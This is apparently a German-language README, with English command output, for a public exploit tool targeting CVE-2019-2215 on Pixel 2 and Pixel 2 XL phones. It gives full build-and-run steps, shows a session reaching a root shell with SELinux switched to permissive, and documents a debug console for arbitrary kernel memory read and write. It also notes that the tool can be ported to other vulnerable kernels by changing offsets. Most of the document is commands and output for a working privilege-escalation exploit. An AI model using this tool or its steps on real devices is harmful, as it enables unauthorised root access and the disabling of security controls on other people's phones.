
Temproot für Pixel 2 und Pixel 2 XL über CVE-2019-2215
Demonstration eines Privilegieneskalationsangriffs, der nur Kernel-Speicher-Lese-/Schreibzugriff erfordert und zu einer temporären Root-Shell führt.
Es funktioniert auf Google Pixel 2/Pixel 2 XL (walleye/taimen) Geräten, die das September 2019 QP1A.190711.020 Image mit Kernel-Version-BuildID 4.4.177-g83bee1dc48e8 ausführen.
Damit dieses Tool auf anderen Geräten und/oder Kernels funktioniert, die von derselben Sicherheitslücke betroffen sind, müssen einige Offsets gefunden und geändert werden. Wie im Project Zero Bugtracker erwähnt, ist das nicht besonders schwierig.
Enthalten ist auch eine Mini-Debug-Konsole, die eine hexeditor-ähnliche Schnittstelle zum Zugriff auf Kernel-Speicher und die Möglichkeit bietet, eine Shell zu starten.
Der Einfachheit halber ist eine Makefile enthalten, die mit der Cross-Compiler-Toolchain des Android NDK r19 oder höher funktioniert.
# Download the Android NDK.
user@host:~$ wget https://dl.google.com/android/repository/android-ndk-r20-linux-x86_64.zip
# Extract the NDK and set its path as $ANDROID_NDK_HOME.
user@host:~$ unzip android-ndk-r20-linux-x86_64.zip
user@host:~$ rm android-ndk-r20-linux-x86_64.zip # optional
user@host:~$ export ANDROID_NDK_HOME=~/android-ndk-r20
# Clone the `cve-2019-2215` git repository and `cd` into it.
user@host:~$ git clone https://github.com/kangtastic/cve-2019-2215.git
user@host:~$ cd cve-2019-2215
# Compile the binary.
user@host:~/cve-2019-2215$ make all # all, clean, debug, debug-static, static, strip
user@host:~/cve-2019-2215$ file cve-2019-2215
cve-2019-2215: ELF 64-bit LSB shared object, ARM aarch64, version 1 (SYSV),
dynamically linked, interpreter /system/, stripped
Sobald die Binärdatei kompiliert ist, übertragen Sie sie auf das Gerät, machen Sie sie ausführbar und führen Sie sie aus. (Irgendwo in /data/ sollte funktionieren.)
taimen:/ $ cd /data/local/tmp
taimen:/data/local/tmp $ install -m 755 /sdcard/cve-2019-2215 ./
taimen:/data/local/tmp $ ./cve-2019-2215
Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215
[+] startup
[+] find kernel address of current task_struct
[+] obtain arbitrary kernel memory R/W
[+] find kernel base address
[+] bypass SELinux and patch current credentials
taimen:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),
1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),
3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:kernel:s0
taimen:/data/local/tmp # getenforce
Permissive
taimen:/data/local/tmp # exit
taimen:/data/local/tmp $
Erfolg ist nicht garantiert und das Gerät kann sogar komplett abstürzen, aber normalerweise wird SELinux auf Permissive gesetzt und eine Root-Shell wird gestartet.
Übergeben Sie debug als einziges Kommandozeilenargument, um eine Mini-Debug-Konsole zu starten, anstatt die Privilegieneskalationsroutine nach Erreichen des Kernel-Lese-/Schreibzugriffs auszuführen.
debug> help
quick help
print
print kernel base address, some kernel symbol offsets,
and address of current task_struct as hexstrings
read <kaddr> <len>
read <len> bytes from <kaddr> and display as a hexdump
<kaddr> is a hexstring not prefixed with 0x
<len> is 1-4096 or 0x1-0x1000
write <kaddr> <data>
write <data> to <kaddr>
<kaddr> is a hexstring not prefixed with 0x
<data> is 1-4096 hexbytes, spaces ignored, to be written *AS-IS*
e.g. if kaddr 0xffffffffdeadbeef contains an int, and you want to set
its value to 1, enter 'write ffffffffdeadbeef <data>', where <data> is
'01000000', '0100 0000', '01 00 0 0 00', etc. (our ARM is little-endian)
shell
launch a shell (hint: did we ~somehow~ become another user? :P)
help
print this help
exit
exit debug console
Setzen Sie SELinux von Permissive zurück auf Enforcing als nicht privilegierter Benutzer.
taimen:/data/local/tmp $ getenforce
Permissive
taimen:/data/local/tmp $ ./cve-2019-2215 debug
Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215
[+] startup
[+] find kernel address of current task_struct
[+] obtain arbitrary kernel memory R/W
[+] find kernel base address
launching debug console, enter 'help' for quick help
debug> print
ffffff9bad880000 kernel_base
ffffff9baf8a57d0 init_task
ffffff9baf8af2c8 init_user_ns
ffffff9baf8e3780 selinux_enabled
ffffff9bafc4e4a8 selinux_enforcing
ffffffe6b2942b80 current
debug> read ffffff9bafc4e4a8 35
ffffff9bafc4e4a8: 0000 0000 0100 0000 002e 40b9 faff ffff ..........@.....
ffffff9bafc4e4b8: 0023 40b9 faff ffff 0000 0000 0000 0000 .#@.............
ffffff9bafc4e4c8: 0000 00 ...
debug> write ffffff9bafc4e4a8 01 00 00 00
debug> read ffffff9bafc4e4a8 4
ffffff9bafc4e4a8: 0100 0000 ....
debug> exit
taimen:/data/local/tmp $ getenforce
Enforcing
taimen:/data/local/tmp $